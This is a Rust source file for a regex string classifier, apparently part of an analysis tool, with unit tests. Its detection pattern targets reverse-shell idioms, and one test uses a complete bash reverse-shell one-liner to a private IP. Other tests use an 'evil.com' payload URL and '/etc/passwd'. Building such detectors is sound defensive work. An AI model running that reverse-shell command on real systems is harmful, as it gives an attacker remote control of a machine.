use crate::classify::StringClassifier;
use crate::StringCategory;
use regex::Regex;
use std::sync::OnceLock;
struct PatternEntry {
regex: Regex,
category: StringCategory,
confidence: f32,
}
const PATTERN_SPECS: &[(&str, StringCategory, f32)] = &[
(
"(?i)^https?://[^\\s<>\"'{}|\\\\^`\\[\\]]+$",
StringCategory::Url,
0.90,
),
(
r"^(?:(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)\.){3}(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)$",
StringCategory::IpV4,
0.95,
),
(
concat!(
r"^(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}$",
r"|^(?:[0-9a-fA-F]{1,4}:){1,7}:$",
r"|^::(?:[0-9a-fA-F]{1,4}:){0,6}[0-9a-fA-F]{1,4}$",
r"|^::$",
r"|^(?:[0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}$",
r"|^(?:[0-9a-fA-F]{1,4}:){1,5}(?::[0-9a-fA-F]{1,4}){1,2}$",
r"|^(?:[0-9a-fA-F]{1,4}:){1,4}(?::[0-9a-fA-F]{1,4}){1,3}$",
r"|^(?:[0-9a-fA-F]{1,4}:){1,3}(?::[0-9a-fA-F]{1,4}){1,4}$",
r"|^(?:[0-9a-fA-F]{1,4}:){1,2}(?::[0-9a-fA-F]{1,4}){1,5}$",
r"|^[0-9a-fA-F]{1,4}:(?::[0-9a-fA-F]{1,4}){1,6}$",
),
StringCategory::IpV6,
0.95,
),
(
r"^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$",
StringCategory::Email,
0.90,
),
(
r"^/(?:usr|etc|var|tmp|home|opt|dev|proc|sys|root|bin|sbin|lib|mnt|run|srv)/[^\s:*?<>|]+$",
StringCategory::UnixPath,
0.85,
),
(
r"(?i)^[A-Z]:\\(?:[^\\/:*?<>|\r\n]+\\)*[^\\/:*?<>|\r\n]*$",
StringCategory::WindowsPath,
0.85,
),
(
r"(?i)^HK(?:EY_(?:LOCAL_MACHINE|CURRENT_USER|CLASSES_ROOT|USERS|CURRENT_CONFIG)|LM|CU|CR)\\",
StringCategory::RegistryKey,
0.95,
),
(
r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$",
StringCategory::CryptoAddress,
0.70,
),
(r"^0x[0-9a-fA-F]{40}$", StringCategory::CryptoAddress, 0.80),
(
r"^bc1[a-zA-HJ-NP-Z0-9]{25,39}$",
StringCategory::CryptoAddress,
0.85,
),
(
r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----",
StringCategory::PrivateKey,
0.99,
),
(
r"^[A-Za-z0-9+/]{20,}={0,2}$",
StringCategory::Base64Blob,
0.40,
),
(
r"/dev/tcp/|/dev/udp/|pty\.spawn|os\.dup2\(|bash\s+-i\s+>&",
StringCategory::ShellCommand,
0.90,
),
];
fn patterns() -> &'static [PatternEntry] {
static PATTERNS: OnceLock<Vec<PatternEntry>> = OnceLock::new();
PATTERNS.get_or_init(|| {
PATTERN_SPECS
.iter()
.filter_map(|(pat, category, confidence)| {
Regex::new(pat).ok().map(|regex| PatternEntry {
regex,
category: category.clone(),
confidence: *confidence,
})
})
.collect()
})
}
pub struct RegexClassifier;
impl StringClassifier for RegexClassifier {
fn name(&self) -> &str {
"regex"
}
fn classify(&self, input: &str) -> Vec<(StringCategory, f32)> {
let mut results = Vec::new();
for entry in patterns() {
if entry.regex.is_match(input) {
results.push((entry.category.clone(), entry.confidence));
}
}
results
}
}
inventory::submit!(&RegexClassifier as &'static dyn StringClassifier);
#[cfg(test)]
mod tests {
use super::*;
fn classify(input: &str) -> Vec<(StringCategory, f32)> {
RegexClassifier.classify(input)
}
#[test]
fn classifies_url() {
let r = classify("https://evil.com/payload.exe");
assert!(r.iter().any(|(c, _)| *c == StringCategory::Url));
}
#[test]
fn classifies_ipv4() {
let r = classify("192.168.1.1");
assert!(r.iter().any(|(c, _)| *c == StringCategory::IpV4));
}
#[test]
fn classifies_email() {
let r = classify("user@example.com");
assert!(r.iter().any(|(c, _)| *c == StringCategory::Email));
}
#[test]
fn classifies_unix_path() {
let r = classify("/etc/passwd");
assert!(r.iter().any(|(c, _)| *c == StringCategory::UnixPath));
}
#[test]
fn classifies_windows_path() {
let r = classify("C:\\Windows\\System32\\cmd.exe");
assert!(r.iter().any(|(c, _)| *c == StringCategory::WindowsPath));
}
#[test]
fn classifies_registry_key() {
let r = classify("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft");
assert!(r.iter().any(|(c, _)| *c == StringCategory::RegistryKey));
}
#[test]
fn classifies_ethereum_address() {
let r = classify("0x742d35Cc6634C0532925a3b844Bc9e7595f2bD28");
assert!(r.iter().any(|(c, _)| *c == StringCategory::CryptoAddress));
}
#[test]
fn classifies_pem_private_key() {
let r = classify("-----BEGIN RSA PRIVATE KEY-----");
assert!(r.iter().any(|(c, _)| *c == StringCategory::PrivateKey));
}
#[test]
fn classifies_shell_command() {
let r = classify("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1");
assert!(r.iter().any(|(c, _)| *c == StringCategory::ShellCommand));
}
#[test]
fn no_match_for_garbage() {
let r = classify("xyzq");
assert!(r.is_empty());
}
#[test]
fn classifies_btc_legacy_address() {
let r = classify("1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa");
assert!(r.iter().any(|(c, _)| *c == StringCategory::CryptoAddress));
}
#[test]
fn classifies_btc_bech32_address() {
let r = classify("bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4");
assert!(r.iter().any(|(c, _)| *c == StringCategory::CryptoAddress));
}
#[test]
fn classifies_base64_blob() {
let r = classify("SGVsbG8gV29ybGQhIFRoaXMgaXMgYSBiYXNlNjQgdGVzdA==");
assert!(r.iter().any(|(c, _)| *c == StringCategory::Base64Blob));
}
#[test]
fn classifier_name() {
let classifier = RegexClassifier;
assert_eq!(classifier.name(), "regex");
}
#[test]
fn classifies_http_url() {
let r = classify("http://example.com/page");
assert!(r.iter().any(|(c, _)| *c == StringCategory::Url));
}
#[test]
fn classifies_private_key_variants() {
let r = classify("-----BEGIN PRIVATE KEY-----");
assert!(r.iter().any(|(c, _)| *c == StringCategory::PrivateKey));
let r2 = classify("-----BEGIN EC PRIVATE KEY-----");
assert!(r2.iter().any(|(c, _)| *c == StringCategory::PrivateKey));
let r3 = classify("-----BEGIN OPENSSH PRIVATE KEY-----");
assert!(r3.iter().any(|(c, _)| *c == StringCategory::PrivateKey));
}
#[test]
fn classifies_ipv6_full() {
let r = classify("2001:0db8:85a3:0000:0000:8a2e:0370:7334");
assert!(
r.iter().any(|(c, _)| *c == StringCategory::IpV6),
"expected IpV6 classification for a full IPv6 address"
);
}
#[test]
fn classifies_ipv6_compressed() {
let r = classify("::1");
assert!(
r.iter().any(|(c, _)| *c == StringCategory::IpV6),
"expected IpV6 classification for loopback ::1"
);
}
#[test]
fn classifies_ipv6_mixed_notation() {
let _r = classify("fe80::1%eth0");
let r2 = classify("fe80::1");
assert!(
r2.iter().any(|(c, _)| *c == StringCategory::IpV6),
"expected IpV6 classification for fe80::1 link-local"
);
}
}